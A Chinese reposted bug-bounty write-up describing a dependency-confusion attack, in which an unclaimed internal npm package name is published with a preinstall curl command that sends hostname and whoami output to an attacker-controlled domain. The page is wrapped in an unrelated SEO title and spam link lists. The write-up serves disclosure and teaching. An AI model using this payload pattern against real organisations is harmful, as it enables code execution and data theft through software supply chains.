当前位置: 首页 > news >正文

基础展示营销型型网站海外网络推广方案

基础展示营销型型网站,海外网络推广方案,胶州建设工程信息网站,河北省建设厅工程信息网站未经许可,不得转载。 文章目录 正文 依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包&#xf…

未经许可,不得转载。

文章目录

    • 正文

依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包,一旦企业系统从公共源解析并下载该包,恶意代码便可能被执行,进而带来安全风险,如远程代码执行(RCE)。

正文

我发现某企业的前端 JavaScript 文件引用了一个存储在/node_modules/@confidential-package-name的Node.js包。进一步查询后,我发现这个内部包尚未在npm公共注册表中注册。

我创建了一个与内部包同名的恶意npm包,并将其发布到公共npm注册表中。在该包的preinstall脚本中,我嵌入了一个简单的命令,用来在安装时自动执行:

curl — data-urlencode “info=$(hostname && whoami)” http://<attacker-controlled-domain>.oast.fun

这个脚本会将服务器的主机名和用户名发送到我控制的域。

img

包上线后,数小时至几天内就收到了来自该公司的生产环境和非生产环境的多个请求,这说明他们的系统正在下载并执行这个恶意包。

img

在收到超过150个HTTP和DNS查询后,我分析IP地址,排除了已知的爬虫流量,并通过WHOIS查询检哪些请求能够匹配企业IP或其服务提供商的IP。可以看到,我实现了RCE:

img

img

原文出处:https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643

http://www.ds6.com.cn/news/19674.html

相关文章:

  • 做seo需要建网站吗谷歌广告联盟怎么做
  • 网站颜色搭配网站女教师遭网课入侵直播录屏曝光8
  • vs2010做的网站百度手机助手下载苹果版
  • 网站开发的基本流程图郑州seo软件
  • 做一个网站需要投入多少钱seo销售好做吗
  • 中国做网站公司排名深圳seo关键词优化
  • 网站设计设计方案专业恶意点击软件
  • 英文网站开发公司seo排名赚挂机赚钱软件下载
  • 独立站店铺怎么注册成都网站制作维护
  • qq空间做宣传网站网络推广公司排行榜
  • 企业门户网站源码下载网站seo推广公司靠谱吗
  • 网站如何做淘宝联盟推广郑州seo关键词排名优化
  • 网站做的好看术语成都百度推广公司联系电话
  • 网站设计的软件今天的新闻 联播最新消息
  • 苏州专业高端网站建设公司湖南有实力seo优化哪家好
  • 网站开发是前端开发吗百度竞价排名是什么
  • 网站开发 用户角色2022千锋教育培训收费一览表
  • 做网站是什么公司企业营销策划方案范文
  • 如何在网站做推广网页设计大作业
  • 公积金网站怎么做增员网站建设黄页免费观看
  • 武汉网站建设外包免费推广平台
  • 电商网站开发prd互联网营销师课程
  • 蚌埠网站建设哪家好网上广告宣传怎么做
  • 开平网络推广seo搜索优化工程师招聘
  • 大背景类型的网站设计求职seo服务
  • 怎样做微商网站58同城安居客
  • 免费公司网站怎么做大数据精准营销
  • 重庆seo薪酬水平北京厦门网站优化
  • 哪个网站是教人做淘宝客的四川成都最新消息
  • 杭州建筑设计公司排名旅游企业seo官网分析报告